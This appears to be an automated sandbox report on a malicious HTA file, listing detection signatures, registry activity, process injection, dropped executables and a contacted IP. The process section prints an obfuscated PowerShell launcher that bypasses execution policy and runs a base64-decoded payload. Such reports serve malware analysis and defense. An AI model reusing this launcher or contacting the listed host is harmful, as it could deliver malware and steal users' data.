Analysis Overview
SHA256
5b6f4c78a2cd6af5d7ce1d063d2f5c6136a6c4fa3a7637dabb36358043c33546
Threat Level: Likely malicious
The file seethebestthingswithgreatthingsbestthingswithgreatentry.hta was found to be: Likely malicious.
Malicious Activity Summary
Blocklisted process makes network request
Downloads MZ/PE file
Evasion via Device Credential Deployment
Executes dropped EXE
Checks computer location settings
Loads dropped DLL
AutoIT Executable
Suspicious use of SetThreadContext
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Suspicious behavior: MapViewOfSection
Suspicious behavior: EnumeratesProcesses
Modifies Internet Explorer settings
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-13 07:32
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-13 07:32
Reported
2024-11-13 07:34
Platform
win7-20240903-en
Max time kernel
122s
Max time network
122s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | N/A |
Downloads MZ/PE file
Evasion via Device Credential Deployment
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\wlanext.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 2672 set thread context of 2300 | N/A | C:\Users\Admin\AppData\Roaming\wlanext.exe | C:\Windows\SysWOW64\svchost.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\wlanext.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\wlanext.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seethebestthingswithgreatthingsbestthingswithgreatentry.hta"
C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE
"C:\Windows\SysTEM32\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE" "pOwErsHell -Ex ByPass -NoP -w 1 -C DEVicecREdEnTiAlDEplOYMeNt ; iex($(Iex('[sYStEM.tExt.EnCodINg]'+[ChaR]58+[CHAr]0X3a+'UTF8.getsTring([SYsTEm.CoNVErT]'+[ChAr]0x3a+[CHAR]58+'FroMBASe64strINg('+[ChaR]0X22+'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'+[chaR]0X22+'))')))"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPass -NoP -w 1 -C DEVicecREdEnTiAlDEplOYMeNt
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\utu7hahj.cmdline"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8D33.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC8D32.tmp"
C:\Users\Admin\AppData\Roaming\wlanext.exe
"C:\Users\Admin\AppData\Roaming\wlanext.exe"
C:\Windows\SysWOW64\svchost.exe
"C:\Users\Admin\AppData\Roaming\wlanext.exe"
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 107.173.4.61:80 | 107.173.4.61 | tcp |
Files
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
\??\c:\Users\Admin\AppData\Local\Temp\utu7hahj.cmdline
\??\c:\Users\Admin\AppData\Local\Temp\utu7hahj.0.cs
\??\c:\Users\Admin\AppData\Local\Temp\CSC8D32.tmp
C:\Users\Admin\AppData\Local\Temp\RES8D33.tmp
C:\Users\Admin\AppData\Local\Temp\utu7hahj.dll
C:\Users\Admin\AppData\Local\Temp\utu7hahj.pdb
C:\Users\Admin\AppData\Roaming\wlanext.exe
C:\Users\Admin\AppData\Local\Temp\juvenilely
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-13 07:32
Reported
2024-11-13 07:34
Platform
win10v2004-20241007-en
Max time kernel
150s
Max time network
150s
Command Line
Signatures
Blocklisted process makes network request
Downloads MZ/PE file
Evasion via Device Credential Deployment
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\wlanext.exe | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 540 set thread context of 4744 | N/A | C:\Users\Admin\AppData\Roaming\wlanext.exe | C:\Windows\SysWOW64\svchost.exe |
| PID 4744 set thread context of 4368 | N/A | C:\Windows\SysWOW64\svchost.exe | C:\Windows\SysWOW64\mshta.exe |
| PID 4744 set thread context of 2060 | N/A | C:\Windows\SysWOW64\svchost.exe | C:\Windows\SysWOW64\mstsc.exe |
| PID 2060 set thread context of 4368 | N/A | C:\Windows\SysWOW64\mstsc.exe | C:\Windows\SysWOW64\mshta.exe |
| PID 2060 set thread context of 1380 | N/A | C:\Windows\SysWOW64\mstsc.exe | C:\Program Files\Mozilla Firefox\Firefox.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\wlanext.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mstsc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \Registry\User\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 | C:\Windows\SysWOW64\mstsc.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\wlanext.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mstsc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mstsc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mstsc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mstsc.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seethebestthingswithgreatthingsbestthingswithgreatentry.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE
"C:\Windows\SysTEM32\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE" "pOwErsHell -Ex ByPass -NoP -w 1 -C DEVicecREdEnTiAlDEplOYMeNt ; iex($(Iex('[sYStEM.tExt.EnCodINg]'+[ChaR]58+[CHAr]0X3a+'UTF8.getsTring([SYsTEm.CoNVErT]'+[ChAr]0x3a+[CHAR]58+'FroMBASe64strINg('+[ChaR]0X22+'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'+[chaR]0X22+'))')))"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPass -NoP -w 1 -C DEVicecREdEnTiAlDEplOYMeNt
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lzzzoozl\lzzzoozl.cmdline"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCDEF.tmp" "c:\Users\Admin\AppData\Local\Temp\lzzzoozl\CSC5E4A05AEE662450799A3E9EDCFB70B1.TMP"
C:\Users\Admin\AppData\Roaming\wlanext.exe
"C:\Users\Admin\AppData\Roaming\wlanext.exe"
C:\Windows\SysWOW64\svchost.exe
"C:\Users\Admin\AppData\Roaming\wlanext.exe"
C:\Windows\SysWOW64\mstsc.exe
"C:\Windows\SysWOW64\mstsc.exe"
C:\Program Files\Mozilla Firefox\Firefox.exe
"C:\Program Files\Mozilla Firefox\Firefox.exe"
Network
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4emfy4h5.qmu.ps1
\??\c:\Users\Admin\AppData\Local\Temp\lzzzoozl\lzzzoozl.cmdline
\??\c:\Users\Admin\AppData\Local\Temp\lzzzoozl\lzzzoozl.0.cs
\??\c:\Users\Admin\AppData\Local\Temp\lzzzoozl\CSC5E4A05AEE662450799A3E9EDCFB70B1.TMP
C:\Users\Admin\AppData\Local\Temp\RESCDEF.tmp
C:\Users\Admin\AppData\Local\Temp\lzzzoozl\lzzzoozl.dll
C:\Users\Admin\AppData\Roaming\wlanext.exe
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\POwersHeLl.ExE.log
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
C:\Users\Admin\AppData\Local\Temp\autE0CB.tmp